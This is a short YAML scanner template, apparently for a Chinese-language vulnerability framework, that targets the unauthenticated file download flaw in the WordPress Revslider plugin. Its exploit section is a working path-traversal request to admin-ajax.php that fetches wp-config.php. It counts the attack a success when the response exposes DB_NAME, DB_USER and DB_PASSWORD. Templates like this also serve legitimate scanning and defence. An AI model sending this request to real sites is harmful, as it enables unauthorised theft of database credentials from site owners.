product: WordPress
vName: Wordpress Revslider - Unauthenticated Arbitrary File Download
type: 文件读取
vID: [ ]
level: 3
vDesc: The Vulnerable Revslider WordPress plugin was affected by an unauthenticated download vulnerability,This could result in attacker downloading the wp-config.php file.
version: ''
note: ''
search: { }
protocol: http
link: https://blog.sucuri.net/2014/09/slider-revolution-plugin-critical-vulnerability-being-exploited.html
fix:
  - 建议联系软件厂商进行处理。
model: ''
logic: and
exploit:
  - exp:
      method: get
      follow: false
      path: /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
    verify:
      logic: and
      check:
        - body:
            value:
              - '''DB_NAME'''
              - '''DB_PASSWORD'''
              - '''DB_USER'''
            logic: and
        - status: 200
